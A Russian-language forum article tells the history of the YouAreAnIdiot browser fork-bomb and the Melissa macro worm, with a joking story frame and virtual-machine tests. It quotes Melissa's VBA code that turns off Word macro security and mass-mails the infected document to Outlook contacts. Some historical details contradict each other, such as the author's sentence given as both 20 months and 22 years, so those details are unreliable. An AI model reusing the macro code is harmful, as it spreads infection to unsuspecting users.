• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Историческая вирусология: The Melissa, YouAreAnIdiot - история, хронология, анализ

Историческая вирусология: разбор легендарных вирусов нулевых - The Melissa, YouAreAnIdiot: история, хронология, анализ

1661855127402.png
1661855147964.png

Алоха, ребята. И сейчас я приведу очень банальный пример развития человеческого общества, здесь не пойдет речь о каких-то древних цивилизациях, возьмем 2020 годик. Вот казалось бы, что изменилось за эти два года? Многое. Та же самая пандемия заставила весь мир выучить такие слова как: антитела, локдаун… Стоп. Кто даун? Локдаун. А-а-а.. И всеми нами любимое выражение: “ Одень масочку на нос, ублюдок, ты ведь дышишь все равно не ртом”. Но дело здесь не только в понятиях, сама сфера ИТ очень спрогрессировала и распространилась в массы, просто за неимением другого выбора. Тот же самый QR-код, раньше какой-то среднестатистический Рикардо Милос из глубинки и понятия не имел о нем, но сейчас уже активно им пользуется. Хотя это лишь поверхностный пример, изменилось действительно многое.

Но не стоит забывать, все, что было раньше - это лишь история, а о ней как раз и наш цикл. Добро пожаловать, Историческая вирусология, а прошлые выпуски здесь:

1. Немного ностальгии: историческая вирусология или LoveLetter в цвете современности - 22 года спустя
2. Историческая вирусология: или 40 миллиардов долларов за 18 лет - MyDoom: хронология, история, анализ
3. Историческая вирусология: Чернобыль — как это было на самом деле или как заставить ваш ПК полететь из окна: история, хронология, анализ - CIH
4. Историческая вирусология: разговор о первом черве - или как одна ошибка изменила ход истории - Morris Worm
5. Историческая вирусология: раняя хронология программ-вымогателей - AIDS, GPcode, Arhivarius. Или как шутка психически больного стала каноном
6. Историческая вирусология: поздняя хронология программ-вымогателей - ZeuS, CryptoLocker, CTB: вирусный трафик ценой в миллиарды. Часть 1
7. Историческая вирусология: локер Илона Маска или как открылась Тесла - поздняя хронология программ вымогателей. Часть 2
8. Историческая вирусология: американский школьник и 250 миллионов - Blaster Worm: история, хронология, анализ
9. Историческая вирусология: Политически предубежденный вирус или как очередное исследование зашло не в ту степь - Confiker: история, хронология, анализ
10. Историческая вирусология: безумное китайское творение, натворившее дел - червь Nimda: история, хронология, анализ
11. Историческая вирусология: сказание о мировом кровотечении - уязвимость HeartBleed: или как я случайно нашел несколько дыр в Codeby
12. Историческая вирусология: хронология вирусов мобильных устройств - CommonWarrior: история, хронология, анализ или почему я передумал покупать Iphone


Типичный вечер, школа. Некоторые ученики из оккультного клуба собрались в своем кабинете, чтобы исследовать какую-то, ну типа мистическую реликвию. Страх. Это именно то, чувство, что даже способно перебить предвкушение. Обстановка соответствует: тусклый свет настольной лампы, окна зашторены и трое людей в черном. И вот один из этих людей, пересиливая самого себя, вскрывает маленькую деревянную коробочку, а там…


Дисклеймер

На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.

И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку.


Основная часть

Это была отсылочка, именно. И сегодня мы поговорим не об одном историческом вредоносе, а о двух-трех, они не смогли нанести огромного ущерба, но все таки вошли в историю. Не слишком известны, их деструктивный потенциал практически нулевой, но все-таки это было, потому давайте же поговорим о них.

Коробочка пуста, Итадори, а именно так зовут нашего главного персонажа и по совместительству смельчака, которого явно раздражает все это. Потому он быстро удаляется домой, оставляя своих друзей наедине.

Персонаж садится за свой компьютер и начинает писать доклад, который ему нужно сдать уже завтра. Спустя несколько часов утомительной работы и нескольких десятков литров поглощенного энергетического напитка, работа практически завершена. И вот, один из его одноклассников, давайте назовем его днокласник.А, сбрасывает ему в мессенджер зашифрованную ссылку, утверждая, что там можно найти готовые оригинальные работы по той же тематике, что им и задали.

Итадори не стал медлить, раз есть возможность дополнить свою работу чем-то, шанс упускать нельзя. Он переходит по ссылке, кстати, пользуется он виндоус ХР и Интернат Эксплорером, просто ПК у него слабый. И вдруг… Начинает играть странная музыка, на экране появляются три смайлика с надписью “You are an Idiot”, попытка закрыть окно браузера не сыскала результативности, окон стало только больше, музыка громче и теперь на мониторе происходит буквально следующее:



Окна браузера продолжают копироваться, теперь их уже около 100, устройство начинает зависать, выдавать какие-то ошибки и после просто отключается. Но без особых проблем загружается снова, но вот незадача, работа Итадори не сохранилась из-за принудительной перезагрузки.
Ну и теперь о том, что же это было.. Поздравляю, вы, как и наш персонаж, попались на одну из первых Форк-бомб интеренета. Она классифицируется как вредоносное ПО с пометкой Joke, шутка мол. Joke:Win32.Idiot - его часто называют преемником NoBrain, но как по мне это не совсем так. Хоть это и веб-троян, но в идеале, он не уничтожает файлы, не внедряется в саму систему и просто взаимодействует с уязвимостью браузера, зачастую приводя к отказу в обслуживании. Написан, к слову если, он на JavaScript, его код разберем немного позже, как и проведем тесты адаптированной версии на Виндоус 11, 10, 7 и ХР.

Ну, и теперь нам понадобится немного исторического контента, чтобы разобраться как же этот вредонос создавался и с чего все это началось. Проследим же путь от банальной песни к созданию вируса, который стал интернет-мемом 2000-х годов.

2002 год - на данном этапе развитие интернет-сообщество оставляло желать лучшего, пусть уже и возникло несколько прецедентов, которые должны были заставить задуматься людей о информационной безопасности, но восприняли уроки лишь единицы. Но не стоит упускать из виду форсированное развитие самого интернета, несмотря на то, что компьютеры могли позволить себе немногие, с каждым днем устройств становилось все больше, как и сайтов, поисковиков и новых почтовых сервисов.

30 мая 2002 года - в сети появляется самая первая версия этой форк-бомбы, назовем её просто YouAnIdiot.A или Offiz. Именно в этот день вредоносный код был загружен на только созданный веб-сайт youanidiot.org. Первоначально эта версия атаковала браузеры IE ниже 4-й версии и распространялась через популярные в то время форумы. Вот пример с Итадори, мол ему скинул этот сайт друг, это реальная картина из 2002 года.

1 июля 2002 года - до сих пор первая версия, но она уже заразила примерно 500.000 машин, здесь ключевую роль играло название самого веб сайта, который попал на первое место в поисковике Яхууу, или как его там. Отсюда и такое количество зараженных устройств.

2 июля 2002 года - на различных сайтах появляется следующая провокационная реклама, которая так и манит неопытного пользователя тех времен кликнуть:

cNfMhyLbk75OmeHmKldswxJoXZPBin-GoiQv7nIpJDKI1yvXV9t8omYUO8AtFZDMPW0CfSHxRjHA1eoDdLctHtRM7UhkWO2320c-NCLGVnMMUfvCs3ny9aGzlyeVNm_zu1-yyidQeaBN5bXNI2DAkqv5bzGO9oY4iNn_UfbmZPpledELoDP13lp5



3 ноября 2002 года - в мир выходит новая и последняя версия скрипта, теперь она перемещена на новый сайт - , именно в этом варинате появляется главный деструктивный фактор этого вредоноса, теперь он способен полностью вывести из строя устройство, путем банального перегруза. Происходило примерно следующее:

Tcz5GLEVOCEnZPRPRbZBrCvLQjnD4MKxGD0up33IKqf7Uk2Vrbs2St_21T1s_sOzeRJlJvmB1SYpHdECWut9QPY49idNHmEBODfVSnl2n117JcCgy_U0wWWSzGq69zlFYOFBdBJYvhg4W_4ecyA8hnHKNwlGtgSOhgOmM9raI2iiZOZVudsEoLiZ


Теперь вирус блокировал все основные комбинации клавиш, не давая ни вызвать диспетчер задач, ни хоть как-то выключить устройство. Единственный вариант - кнопка на системнике или же вилку из розетки. Примерное количество жертв увеличилось на тысяч триста.

Этот вредонос начал считаться зловредным только в 2006 году, когда Майкрософт посвятила ему целую статью, где было рассказано о его опасности, способах предотвратить заражение и наконец до них дошло, что нужно запретить браузеру выполнять произвольные джава скрипты на сайтах. Создатель этого вируса никак не скрывался и всячески пытался привлечь к себе внимание, что у него получилось достаточно неплохо.

Зовут его кстати Эндрю Регнер, он уроженец Сан-Антонио, США, никак не был наказан за создание подобного сайта, хотя в 2007 году была опубликована статья, в которой сообщалось, что создателя вируса YouAreAnIdiot нашли избитым в собственной квартире. Видимо кому-то его шутка не понравилась. Ущерб от его творения оценивают в скромные двести-триста тысяч долларов, что совсем ничего, если судить по прошлым нашим исследуемым.

А теперь к тому, как же он работает и что в нем такого уникального, если вообще что-то есть. Поехали.

Что происходит в момент открытия сайта с этим скриптом?

М-м-м, все мои виртуальные машины оказались убиты Монооксидом, поэтому пойду-ка я переустанавливать их. Скоро вернусь.

Итак, я вернулся. Для тестов будем использовать реборн этого самого скрипта, который адаптирован под современные браузеры, кое-кто под ником EnderMan создал вот этот сайтец, не переходите, ибо он работает даже в хроме, но я оставлю его здесь - .

Итак, первый тест, виндоус ХР, переходим по ссылке и… Сразу же начинает играть вот эта раздражающая музычка и мерцающая надпись, мол я идиот. Ладно. Попытаемся закрыть окно. Сразу же создаются две его копии и бегают по всему экрану, не давая закрыть их. Воспользуемся-ка диспетчером, его вызов никак не блокируется, если в случае с Монооксидом бегал курсор, из-за чего невозможно было что-либо сделать, то здесь все в норме. При попытке закрыть один процесс, открывается ещё десяток и так до бесконечности. Отказа в обслуживании не последовало, но нормальной работе системы препятствовать ему удалось.

Но меня заинтересовало следующее, в определенный момент загрузка процессора достигла ста процентов, а я напоминаю ,что конфигурация виртуального устройства, была такой же, как и в цикле Магической Битвы, а именно: 4 ядра, 6 гигабайт оперативной памяти, а теперь давайте проведем реалистичный эксперимент. Допустим, что на дворе 2002 год и у нас не самый мощный ПК: 256 мегабайт оперативной памяти и один процессор с ограничением до 2 Ггц, просто меньше выставить нельзя. Будет ли результат другим? Айда проверим.

Ну-у, ничего особого не произошло, память и процессор были забиты в миг, но вот паук открылся, хотя выдавал дикие фризы и кадров в секунду около двух трех. Ну, можете на видео глянуть короче.

А сейчас хотелось бы взглянуть на сам исходный код данного вредоноса. Кстати, современные браузеры при переходе, демонстрируют вот такой вот баннер, ну типа небезопасно, но всегда можно нажать “Перейти на сайт”.

Итак, сие чудо у нас обычный HTA-малварь, помните мы что-то подобное когда-то делали уже, ХТАшка загружается на сервер вместе с index.html или .php, которая и ссылкает на выполнение вредоносного кода. Но это если говорить о последних версиях, первая же представляла собой вот это:

37jiKgLjAH9-n2N8eELHL7AJxlBCSuJps-9mkrGwv-Qi3aHxRRQ2UV6MGlFpZCRsw0hEKezyDay_NEUJ-Phoqq4P1LQBPhq5n2P6GvmHTc3aaPOd-HXX7zjNJHkLYFUUjt67fuLMMALHWWuexAKVcj9ojpSbUfvTSCZF2-knx7AQXq7-Byo3oZ4Ekg

Если честно, то совсем ничего необычного: запрос на создание рандомного количества окон, путем математического вычисления, да и все, так же заложена функция “бегающего” окна с рандомными координатами.

У-у, часть вторая короче, да. Поговорим о достаточно специфическом вирусе, существование которого я нахожу забавным для себя, давайте вообразим себе следующую картину, опираясь на сюжет.

Итадори, уже слегка оправился после потери своей работы, которую, кстати, он не стал переписывать, скинув все на своего дноклассника.А. И вот он решает зайти в OutLook, ну не тянет у него обычный почтовый сервис ПК, простим его.

Первым, что бросается ему в глаза - письмо от какого-то Джона Смита:

oYN03NR9KuBKDuEitOY1koixy0BH-CtTWUawI_uiVstjVmfS8REv6-3-N0tQ10rWNzqeWmlrWvloV9Se3vBXWU7BO0xDuId7PIEqV-ugTi_ScHK6d8WCp0qXD6EleRuYpzaN05Bdj4IVpLJHfK3Wa6sNBniHy6RBWA_XbuVEjsFlOYlSwJHNYYgq4g


Ничего не подозревая, ведь на дворе уже современный 2222 год, никакие вирусы из прошлого ему не страшны!


И вот он решает спокойно посмотреть контент для взрослых и слегка расслабиться, не будем уточнять, что именно наш герой будет делать, но вдруг … Открывается медиаплеер и проигрывает запись с какой-то непонятной танцующей женщиной, а после… Синий экран смерти.

А что же это было и где же жулик?

На деле рад приветствовать в нашем цикле легенду, это что-то типа отца ILOVEU, так как Меллиса - это действительно первый вредонос в истории, который начал использовать такие коварные, ну на то время только, методы социальной инженерии.

Тянуть не будем, сразу же к хронологии событий:

26 марта 1999 года - учетная запись какого-то редактора AOL - Америка Онлайн, это типа что-то популярного новостного сайта тех времен, был взломан и от его имени был опубликован пост с названием “alt.sex”, в котором… Были деясятки тысяч паролей для просмотра контента 18+, если кто не знал, то в то время такие сайты были запаролены, а чтобы насладиться этим зрелищем нужно было платить, что вполне себе звучит здорово, ведь в современном мире это решило бы множество проблем. Как по мне. И вот во вложениях имелся некий документ.doc, скачав и открыв его - происходило выполнение макроса и на устройство попадал вредонос Меллиса, имя кстати в честь стриптезерши было дано.

26 марта 1999 года - естественно, что вирус начал распространяться ужасающими темпами для тех времен. Спустя 12 часов было заражено уже около 250.000 устройств.

27 марта 1999 года - компьютеры Майкрософт и корпуса морской пехоты США были подвержены атаке Мелиссы, были отключены большинство локаторов, как воздушных так и водных, вследствие чего пострадала обороноспособность государства.

28 марта 1999 года - количество зараженных устройств достигло отметки в миллион. Делом начало заниматься Федеральное Бюро Расследований и в этот же день ФБР создало новое национальное киберподразделение, занимающееся онлайн-преступлениями.

29 марта 1999 года - деятельность вируса начала вызывать перегрузки почтовых сервисов и их отказ. Мировой трафик уменьшился на 15% исключительно благодаря Мелиссе. Уже на это время был оценен ущерб в 60 миллионов.

1 апреля 1999 года - создатель вируса был арестован в Нью-Джерси по наводке AOL и благодаря совместным усилиям ФБР и полиции штата Нью-Джерси. Обвинили его в причинении ущерба на сумму 80 миллионов долларов США путем нарушения работы персональных компьютеров и компьютерных сетей в бизнесе и правительстве.

2 апреля 1999 года - Майкрософт выпускает патч, который запрещает произвольное выполнение VBS скриптов при открытии файлов в Word’e, ну и вирус потихоньку сам по себе загнулся.

10 декабря 1999 года - Джон Смит признал себя виновным по обвинению второй степени в краже компьютера и куче других нарушений. И спустя два года отправился за решетку на 20 месяцев и был оштрафован на 5.000 долларов.

2022 год - Джон Смит до сих пор находится под заключением. До сих пор неизвестна точная причина, но выпускать оттуда его не особо-то и хотят. Жалко пацана.


Ну и теперь о том, как же все это было реализовано. Сперва о распространении, но думаю, что здесь и так все ясно. Сразу же после открытия, запускался вредоносный VBS, который захватывал последние 50 адресов из книги Outlook и рассылал по них письма с различными заголовками, хотя в основе все сводилось к такому: «sexxxy.jpg» или «твоя голая жена» или как вариант на скрине выше.

Затем происходит поиск всех имеющихся на жестком диске .doc файлов и импорт в них VBS скрипта Мелиссы. То есть потенциально опасными становились все файлы Ворда на устройстве. Здесь все по принципу банальной СИ тех времен: вы видите письмо от знакомого адреса с заголовком “твоя голая жена” и автоматически качаете сие дело, а затем наслаждаетесь множественными окнами с флоридской стриптизершей Мелиссой, пока ваш Виндоус не умрет от перегрузки.

Давайте более детально рассмотрим исходный код вируса, здесь как-бы все очень-очень просто.

Вот эта строка отвечает за отключение безопасности в WORD 2000 и 95, путем редактирования реестра с помощью VBS:
Код:
If System.PrivateProfileString("",

"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""

Then

CommandBars("Macro").Controls("Security...").Enabled = False

System.PrivateProfileString("",

"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

Else

CommandBars("Tools").Controls("Macro").Enabled = False

Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):

Options.SaveNormalPrompt = (1 - 1)

Здесь же можем наблюдать за тем, как проверяется наличие Outlook и генерацией писем:
Код:
If System.PrivateProfileString("",

"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"

Then

If UngaDasOutlook = "Outlook" Then

DasMapiName.Logon "profile", "password"

    For y = 1 To DasMapiName.AddressLists.Count

        Set AddyBook = DasMapiName.AddressLists(y)

        x = 1

        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

        For oo = 1 To AddyBook.AddressEntries.Count

            Peep = AddyBook.AddressEntries(x)

            BreakUmOffASlice.Recipients.Add Peep

            x = x + 1

            If x > 50 Then oo = AddyBook.AddressEntries.Count

         Next oo

         BreakUmOffASlice.Subject = "Important Message From " &

Application.UserName

         BreakUmOffASlice.Body = "Here is that document you asked for ... don't

show anyone else ;-)"

         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName

         BreakUmOffASlice.Send

         Peep = ""

    Next y

DasMapiName.Logoff

Также привлекает внимание копирайтинг “by Kwyjibo”, что натолкнуло меня поискать этого паренька, оказалось, что это просто псевдоним нашего Джона. Насколько же нужно быть идиотом, чтобы указать свой ник в коде вируса, при учете, что этот ник ты используешь везде… Просто везде. Нонсенс.

Ну и в коде больше ничего особого и нет. Давайте-ка проверим сие чудо на Виндоус 2000 и попытаемся его остановить. В руки мне попала самая первая версия, которая содержала пароли для сайтов с проном, не будем особо разбираться, сразу же откроем, прежде создав учетную запись аутлук.

yyVguT1sd97m3e8oMS2KAoUuFXJ6PJFtFMDnZKVjrCnOgyNBoyldX5S6Cqd6edBPdNTnUHMAaCPcA-XpM5r4VONRG_kiEgHVEkjYEpnwJY5wN_lk4v2YGcSRHJsLVoANyJhHSSSaVhQe92q-TqD9CA8FsbHo5ddKNTRiXFEG7r33VlTNf5ipkdS9hw


Открывается действительно как обычный текстовый файл, но если посмотреть в почтовый клиент, то видим, что письмо с текстом, как на первом скрине этого раздела и вложением list.doc было отправлено. Кстати, забыл сказать, что в коде имелся ещё и таймер, который открывал видео со стриптезершой каждые 20 минут.

Изменим системное время и посмотрим, что же случится. Открывается проигрыватель с видосиком, содержимое показывать не стану. Если заглянуть в планировщик задач, то можем заметить как раз две задачи: открытие видео и запуск скрипта после перезагрузки. Если их удалить, то… Все. Как бы… Вирус повержен. Хотя после у меня виндоус выдает синий экран.

Итоги

Ну-у.. Что же.. Поговорили мы о двух вирусах нулевых годов, один из которых был простой шуткой, ставшей мемом: у него не было прям разящих деструктивных функций, но все таки он нанес ущерба на 200.000 долларов, что достойно. Зачастую если что-то и случалось, так только с несохраненными данными, как у нашего героя Итадори. Но иногда, если уж ПК совсем слаб, то была вариация будущего с отказом аппаратной части. Этот вредонос до сих пор актуален, так как был адаптирован под современные браузеры. А это все было о первом представителе браузерных форк-бомб - youareanidiot.

Далее мы быстренько разобрали первого почтового червя на VBS - Мелисса и узнали о его печальной судьбе в виде 22 лет заключения. Уменьшение мирового почтового трафика на 15%, больше чем 300 почтовых компаний были вынуждены прекратить свою работу, пострадала обороноспособность США, Майкрософт выпал из жизни на целых два дня. Как итог - 80 миллионов долларов ущерба.

А создателя постигла очень печальная судьба, но он был до невозможности глуп. Мелиссу можно по праву считать отцом вируса Ilovetyou, но Джон Смит оказался очень глупым, за что и поплатился. Видимо Анель де Гузман оказался намного умнее только потому, что учел ошибки своего коллеги предшественника.

А на этом у меня все, с вами был как всегда какой-то парень под ником DeathDay (а также его редактор Яш), и цикл Историческая вирусология. Мира всем, не прощаюсь.

2000-2002 - The Melissa, YouAreAnIdiot​
 
Последнее редактирование:
  • Нравится
Реакции: вася трубочист
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!